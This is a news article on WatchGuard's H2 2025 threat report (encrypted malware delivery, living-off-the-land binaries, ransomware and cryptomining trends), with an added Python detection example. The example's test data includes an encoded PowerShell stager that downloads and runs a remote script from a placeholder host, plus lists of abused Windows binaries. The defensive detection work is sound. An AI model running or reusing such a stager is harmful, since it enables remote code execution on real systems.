
WatchGuard warns of surge in evasive, encrypted malware

Fri, 20th Feb 2026

WatchGuard reported a steep rise in new and evasive malware in the second half of 2025, along with a jump in threats delivered over encrypted connections. The findings point to growing pressure on signature-based security tools.

Its H2 2025 Internet Security Report found unique endpoint malware rose more than 1,548% in the second half of the year, with a spike between the third and fourth quarters. It also found that 23% of detected malware evaded signature-based detection.

The report draws on aggregated threat intelligence from WatchGuard's network security, endpoint, and DNS filtering products. The figures reflect what many security teams see across hybrid environments, where endpoints span on-premises systems and cloud services, giving attackers more room to operate.

WatchGuard's data shows malware delivery and detection patterns shifted quickly over the period. Network-based malware detections rose 26% from the first half to the second half of 2025, while network attacks fell 28% over the same period. Unique network exploits also declined.

Encrypted traffic

One of the sharpest changes involved malware delivered over encrypted connections: evasive malware detected over TLS rose by almost 2,000%.

Encrypted delivery also accounted for most blocked threats in the telemetry. According to the report, 96% of blocked malware arrived over TLS, underscoring the challenge for organisations that do not inspect encrypted traffic at the network edge.

The report also noted a drop in zero-day malware, which fell to 23% of total detections. That matches its separate finding that 23% of malware evaded signature-based detection, which it treats as a proxy for zero-day behaviour.

Endpoint shift

The research points to a change in endpoint techniques, with Living-off-the-Land Windows binaries becoming the top endpoint malware vector in the second half of 2025.

Living-off-the-land techniques rely on tools already present in Windows environments. Attackers use legitimate processes and binaries to blend in with normal administrative activity, reducing the value of static indicators such as known malicious files.

Malicious scripts declined gradually over the past year, a shift the report links to greater use of built-in Windows tools and trusted processes as primary infection vectors.

Ransomware and mining

The findings also suggest a change in how attackers pursue revenue. Ransomware detections fell 68% in 2025, while cryptomining activity rose significantly.

The report argues the drop in ransomware volume did not ease commercial pressure from extortion. It says public extortion payments reached record levels, suggesting fewer incidents but higher-value targets.

Cryptomining remains attractive because it can generate returns once access is established, and it can run for long periods if it avoids detection, especially in environments with limited visibility across endpoints and network traffic.

MSP implications

WatchGuard framed the results as a warning for managed service providers and their customers. "Today's threat landscape has outgrown point solutions and reactive security models," said Corey Nachreiner, chief security officer at WatchGuard Technologies.

"For MSPs, the business risk is especially high. Client breaches increase support costs, damage trust, and create a clear competitive disadvantage. The MSPs that will succeed in 2026 and beyond are those that can clearly demonstrate proactive threat intelligence and unified protection across their customers' environments," Nachreiner said.

WatchGuard's commentary emphasised the limits of defences that rely heavily on signatures in environments where malware changes quickly and attackers use encryption and legitimate tools. The report says attackers increased both the volume and sophistication of malware during 2025, with growth in new malware each quarter.

It also described phishing campaigns in the second half of 2025 that used malicious PowerShell scripts as a staging step for malware tools, including remote access trojans, while trying to evade automated file analysis. The report casts this as an example of attackers refining delivery methods, even as some script-based techniques declined overall.
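To show what detecting the living-off-the-land and PowerShell staging patterns described above looks like in practice, here is an added example (not from the report or from WatchGuard) in Python: it triages constructed process-creation events, decodes a PowerShell -EncodedCommand argument so the hidden script can be inspected, and flags an Office parent launching a script host or Windows built-in. The event fields, sample command lines and placeholder URL are all assumptions made for the example.

```python
import base64
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields). The
# encoded command is built here from a placeholder URL so the sample is
# self-contained; none of this is WatchGuard telemetry.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage.ps1')"
ENC = base64.b64encode(STAGER.encode("utf-16-le")).decode()
EVENTS = [
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENC}"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\ops\\backup.ps1"},
    {"parent": "EXCEL.EXE", "image": "mshta.exe",
     "cmdline": "mshta.exe C:\\Users\\a\\AppData\\Local\\Temp\\x.hta"},
    {"parent": "svchost.exe", "image": "rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Windows built-ins commonly abused as script hosts or loaders (LOLBins).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
NET_KEYWORDS = ("downloadstring", "downloadfile", "invoke-webrequest",
                "net.webclient", "iex ", "invoke-expression")
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc).
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -enc/-EncodedCommand, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def flag_event(ev):
    """Reasons an event looks like LOLBin/PowerShell staging (empty if clean)."""
    reasons, parent, image = [], ev["parent"].lower(), ev["image"].lower()
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append(f"office app {parent} spawned {image}")
    decoded = decode_encoded_command(ev["cmdline"])
    if decoded is not None:
        reasons.append("encoded PowerShell command")
        if any(k in decoded.lower() for k in NET_KEYWORDS):
            reasons.append("decoded script fetches remote content")
    if re.search(r"-w(?:indowstyle)?\s+hidden", ev["cmdline"], re.I):
        reasons.append("hidden window requested")
    return reasons

def triage(events):
    """Return (index, reasons) for every event that triggers at least one rule."""
    flagged = [(i, flag_event(e)) for i, e in enumerate(events)]
    return [(i, r) for i, r in flagged if r]
```

Decoding the argument rather than matching on the raw base64 is the point: the same stager re-encoded with a single extra space produces a completely different string, which is exactly the signature evasion the report measures.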

On the network side, it found that most detections continued to target long-standing vulnerabilities, including those affecting web applications. It highlighted intrusion prevention systems and layered defences as part of the response to persistent exploitation of older weaknesses.

WatchGuard said the findings strengthen the case for continuous monitoring and a more integrated approach across endpoint and network controls, as attackers continue to rely on encryption, obfuscation, and living-off-the-land techniques.